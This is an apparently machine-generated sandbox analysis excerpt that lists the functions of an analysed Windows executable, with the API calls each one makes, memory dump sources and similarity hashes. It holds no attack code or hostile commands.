Function 007E1E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E1E6F

Part of subcall function 007E1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1F18
Part of subcall function 007E1EF9: InternetCloseHandle.WININET(00000000), ref: 007E1FB5

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 47c5784999cd9cd91d663ff43f8db06f349e7a90f94ac4a7c0cf056bf7c2f444
Instruction ID: e5cd3c07083982143085f5114609215be1682bb83acdbfe0639fb665ef99a3e3
Opcode Fuzzy Hash: 47c5784999cd9cd91d663ff43f8db06f349e7a90f94ac4a7c0cf056bf7c2f444
Instruction Fuzzy Hash: 6621D131201645BFEB119F62CC02FBBB7AEFF8C702F44401AFE0196650DB79A8219B90

Function 007F634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007F63BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F63F3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
Instruction ID: fdba685d7920014f604a46390698655bde2b80c26739a912a229f79260ae837e
Opcode Fuzzy Hash: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
Instruction Fuzzy Hash: 30119631305518AFDB14AB24DC49FBA77A9EF45320F148119F616D73D2CBA8AD01CB95

Function 007CE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF867
Part of subcall function 007CF858: lstrcpyW.KERNEL32(00000000,?), ref: 007CF88D
Part of subcall function 007CF858: lstrcmpiW.KERNEL32(00000000,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE488
lstrcpyW.KERNEL32(00000000,?), ref: 007CE4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4E2

Strings

cdecl, xrefs: 007CE4D9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b5f6e11266776f7617934ed87ba9974e7b71684ed45bc427114ca4060ebd7b28
Instruction ID: e009f547a9cb4ac4d721647b8d310bc913ed4856b30d48297ff52b0aa3cf9c81
Opcode Fuzzy Hash: b5f6e11266776f7617934ed87ba9974e7b71684ed45bc427114ca4060ebd7b28
Instruction Fuzzy Hash: 7511603A200345EFDB25AF24EC49E7A77A9FF45350B80402EF806CB2A0FB759951CB91

Function 007A5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007A5331

Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
Instruction ID: 66028b49f21bdc308f5a2d112033072a93df63beed57a2ca693edf2eaa8fae12
Opcode Fuzzy Hash: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
Instruction Fuzzy Hash: 2F112732505E15EFCF253F70BC0975E3794AFD63A5F110B29F8189A190CEBC89408780

Function 007D4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007D4385
_memset.LIBCMT ref: 007D43A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007D43F8
CloseHandle.KERNEL32(00000000), ref: 007D4401

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
Instruction ID: 78a9ad867a479d79b7651d7b76062bae33b236ed956efcf1b481e80555137e95
Opcode Fuzzy Hash: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
Instruction Fuzzy Hash: 09118A75901228BBD7309BA5AC4DFEBBB7CEF45760F10459AF908E7290D6744E808BA4

Function 007E6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065

gethostbyname.WSOCK32(?,?,?), ref: 007E6A84
WSAGetLastError.WSOCK32(00000000), ref: 007E6A8F
_memmove.LIBCMT ref: 007E6ABC
inet_ntoa.WSOCK32(?), ref: 007E6AC7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
Instruction ID: b8a6821a75b888c67683dafd5ea247bbc55e0dc7ef4b619fe0e25fdd9b985fb1
Opcode Fuzzy Hash: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
Instruction Fuzzy Hash: FA114F71900109EFCB44FBA4DD4ADAEB7B8FF18311B148065F506A72A2DF359E14DBA1

Function 0077166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
GetClientRect.USER32(?,?), ref: 007AB93C
GetCursorPos.USER32(?), ref: 007AB946
ScreenToClient.USER32(?,?), ref: 007AB951

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
Instruction ID: c4369f5d0765001c434cdf425d879a5338e63f09b2c927c253f8518ed20ba38e
Opcode Fuzzy Hash: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
Instruction Fuzzy Hash: 4F114375A00119EBCF10EF98C8899BE77B9FB45300F944499EA15E7141CB38BA51CFA1

Function 007C96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 007C9719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C9741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C975C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
Instruction ID: 243b742e4ce3c581b3cdbbea371c8b0d9b973090743d7f4a7bb28fa9a1be9226
Opcode Fuzzy Hash: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
Instruction Fuzzy Hash: 11115A39901218FFEB11DF95CD84F9DBBB8FB48710F204099EA00B7290D671AE10DB90

Function 00772111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
GetStockObject.GDI32(00000011), ref: 00772163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
Instruction ID: 37a2a20bb87e05dc9f06de63df1656a23cb671be1d0da349fd25e46669544f83
Opcode Fuzzy Hash: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
Instruction Fuzzy Hash: 8F118B7210120DBFDF125F909C44EEA7BA9FF583A4F444211FA2852111C73ADC61EFA0

Function 007D1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D1983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D198D
Sleep.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D19C0

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
Instruction ID: a91abccd71289c919daaa5b77651d248edbb0f697840db07ecded2916e6075ce
Opcode Fuzzy Hash: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
Instruction Fuzzy Hash: 40112731D0466DEBCF00DFA5D9A8BEEBB78FF08751F804156E981B2245CB34A660CB91

Function 007FE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007FE1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 007FE201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 007FE216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 007FE234

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
Instruction ID: 7db48f0cc99427c1f16740a789845367c387c20e9b4e065cffdeccd60159e631
Opcode Fuzzy Hash: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
Instruction Fuzzy Hash: A91161B5206B08DBE3308F51DD08FA3BBBCFB00B14F108559A756D6261E7B4E504AFA5

Function 007A71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 007A720B

Part of subcall function 007A78F2: __fltout2.LIBCMT ref: 007A791B

__cftog_l.LIBCMT ref: 007A7231
__cftoe_l.LIBCMT ref: 007A7263

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 8f2730bade12d0417e78c134448a3c31b8d4a228334757a1f92bf317b035e365
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: CB017B3604814ABBCF1A5E84CC059EE3F36BB9A340B488615FA1858171C33AC9B1EB81

Function 007FB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007FB956
ScreenToClient.USER32(?,?), ref: 007FB96E
ScreenToClient.USER32(?,?), ref: 007FB992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB9AD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
Instruction ID: b9be99f129e262bf0252e45d37ac50ec5238b845274790f85fedeee7f2b44681
Opcode Fuzzy Hash: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
Instruction Fuzzy Hash: 461143B9D00209EFDB41CF98C984AEEBBF9FB58310F108156E924E3610D775AA658F50

Function 007FBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007FBCB6
_memset.LIBCMT ref: 007FBCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00838F20,00838F64), ref: 007FBCF4
CloseHandle.KERNEL32 ref: 007FBD06

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
Instruction ID: 16beb5cb7e992f2637e177be3421f17ddd3cbff2dbce616686b645a4bf75c91b
Opcode Fuzzy Hash: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
Instruction Fuzzy Hash: C0F012B2640304FFE75067A5AC09FBB3A5EFB49755F000821BB08E61A2DF795D1097A9

Function 007D7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007D71A1

Part of subcall function 007D7C7F: _memset.LIBCMT ref: 007D7CB4

_memmove.LIBCMT ref: 007D71C4
_memset.LIBCMT ref: 007D71D1
LeaveCriticalSection.KERNEL32(?), ref: 007D71E1

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 1724da39d9fd6b7dedcb0391d8392b648caefb9d52dcc9ee69b883613f1dc845
Instruction ID: b15ad8593cb059e84ba9dac8a8e2a5470c14327f2a5b82dde45b6236880f7bc8
Opcode Fuzzy Hash: 1724da39d9fd6b7dedcb0391d8392b648caefb9d52dcc9ee69b883613f1dc845
Instruction Fuzzy Hash: 0BF05E3A200100EBCF416F55EC89B4ABB29FF45321F08C051FE085E22ACB35A921DBB4

Function 007FC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC3E8
LineTo.GDI32(00000000,?,?), ref: 007FC3F5
EndPath.GDI32(00000000), ref: 007FC405
StrokePath.GDI32(00000000), ref: 007FC413

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
Instruction ID: 258f551266e7957d744417171c07ff268c27dfee1c5d679664ee38c2adff3d4f
Opcode Fuzzy Hash: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
Instruction Fuzzy Hash: EDF05E3100565DBADB636F54AC0DFEE3F99BF05321F148010FB51611E187B85551DFA9

Function 007CAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
GetCurrentThreadId.KERNEL32 ref: 007CAA89
AttachThreadInput.USER32(00000000), ref: 007CAA90

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
Instruction ID: 0ab974f70f72250ac53cae3fdcfa3a9b6a0e3413991eeb2cf4b7fe4e8fbe77ae
Opcode Fuzzy Hash: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
Instruction Fuzzy Hash: 4DE0393154132CBADB615FA29D0CFEB3F5DFF257A2F008019F51984060CB768550CBA0

Function 007725F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0077260D
SetTextColor.GDI32(?,000000FF), ref: 00772617
SetBkMode.GDI32(?,00000001), ref: 0077262C
GetStockObject.GDI32(00000005), ref: 00772634
GetWindowDC.USER32(?,00000000), ref: 007AC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 007AC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 007AC203
GetPixel.GDI32(00000000,?,?), ref: 007AC223
ReleaseDC.USER32(?,00000000), ref: 007AC22E

Memory Dump Source

